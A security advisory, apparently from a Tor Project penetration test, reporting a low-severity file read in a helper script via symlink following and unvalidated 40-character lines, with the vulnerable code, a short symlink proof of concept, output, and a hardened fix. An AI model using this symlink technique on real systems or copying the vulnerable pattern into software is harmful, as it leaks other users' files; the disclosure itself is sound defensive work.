TOR-014 pen-torproject#14: helper-scripts - Limited File Read in badconf-entry due to insecure Fingerprint validation via symlinks

Because fingerprints read from the input file are not validated and symlinks are followed when that file is opened, a low-privileged attacker on the same system can leak content from other files.


Author Maintainer

Technical Description

The load_args_as_fp function opens the file named by its first argument and prints every line that is exactly 40 characters long and does not start with a #. Because the line is never checked for being a valid fingerprint and the path is opened with plain open(), which follows symlinks, a low-privileged attacker can point the script at a file they cannot read themselves and have its 40-character lines echoed back.

helper-scripts/util.py

```python
import os


def load_args_as_fp(args, fps):
    # Try to load the filename as arg.
    if len(args) > 1:
        filename = args[1]
        if os.path.exists(filename):
            print("[+] Using file %s..." % (filename))
            # open() follows symlinks, so filename may resolve to any file
            # the script's user can read.
            with open(filename, "r") as fd:
                for line in fd:
                    line = line.strip()
                    # Ignore commented fingerprint
                    if line.startswith("#"):
                        continue
                    # Only the length is checked; the content is not validated
                    if len(line) != 40:
                        continue
                    if line not in fps:
                        fps.append(line)
                        print("  [+] Adding %s" % (line))
```

Proof of Concept

1. Create leak file `echo -e "B\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nC" > leak_me`
2. Symlink file `ln -sf leak_me fps.txt`
3. Run vulnerable script `python3 badconf-entry.py fps.txt`

Output, showing the leaked string AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:

The string is printed on stdout and is also written to the file approved-routers.d/approved-routers.conf.

```
[+] Tor documents loaded successfully
      - 6925 relays in consensus
      - 7188 server descriptors
      - 2204 bridge descriptors published in the last day
[+] Using file fps.txt...
  [+] Adding AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
No AuthDirReject rules to create...
Continuing with !reject rules.
```


Impact

Low-privileged users may be able to leak sensitive data from other files, depending on the configuration of the system. Because only lines that are exactly 40 characters long are printed, the attacker scenario is limited, and this vulnerability has been rated as Low.


Recommendation

Validate each line against the regular expression ^[0-9A-Fa-f]{40}$ (or parse it with stem) and do not follow symlinks when opening the input file.
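As an added illustration of that recommendation (example code, not part of the helper-scripts repository), a hardened loader that opens the file with O_NOFOLLOW and keeps only 40-hex-digit lines, exercised against the advisory's own setup in a temporary directory. It assumes a POSIX system; note that the regex alone would not have stopped this PoC, since 40 "A" characters are valid hex, so refusing the symlink is the part that actually blocks the leak.

```python
import errno
import os
import re
import tempfile

# A Tor relay fingerprint is 40 hex digits (SHA-1 of the relay identity key).
FINGERPRINT_RE = re.compile(r"^[0-9A-Fa-f]{40}$")

def load_fingerprints(filename, fps):
    """Append new valid fingerprints from filename to fps; return rejected lines."""
    # O_NOFOLLOW makes open(2) fail when the last path component is a symlink,
    # so there is no check-then-open race as with a separate os.path.islink().
    try:
        fd = os.open(filename, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError as exc:
        # Linux and macOS report ELOOP for a refused symlink, FreeBSD EMLINK.
        if exc.errno in (errno.ELOOP, errno.EMLINK):
            raise ValueError("refusing to follow symlink %s" % filename) from exc
        raise
    rejected = []
    with os.fdopen(fd, "r") as fh:
        for raw in fh:
            line = raw.strip()
            if not line or line.startswith("#"):
                continue  # blank line or comment
            if not FINGERPRINT_RE.match(line):
                rejected.append(line)  # wrong length or non-hex characters
                continue
            if line not in fps:
                fps.append(line)
    return rejected

def demo():
    """Rebuild the advisory's setup in a temp dir; return (error, fps, rejected)."""
    with tempfile.TemporaryDirectory() as d:
        leak, link, real = (os.path.join(d, n) for n in ("leak_me", "fps.txt", "real.txt"))
        with open(leak, "w") as f:  # constructed: the file the attacker wants read
            f.write("B\n" + "A" * 40 + "\nC\n")
        os.symlink(leak, link)  # constructed: attacker-controlled symlink
        with open(real, "w") as f:  # constructed: one valid fp, one non-hex 40-char line
            f.write("# comment\n0123456789ABCDEF0123456789ABCDEF01234567\n" + "G" * 40 + "\n")
        error, fps = None, []
        try:
            load_fingerprints(link, fps)
        except ValueError as exc:
            error = str(exc)
        rejected = load_fingerprints(real, fps)
        return error, fps, rejected
```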


Type

CWE-61: UNIX Symbolic Link (Symlink) Following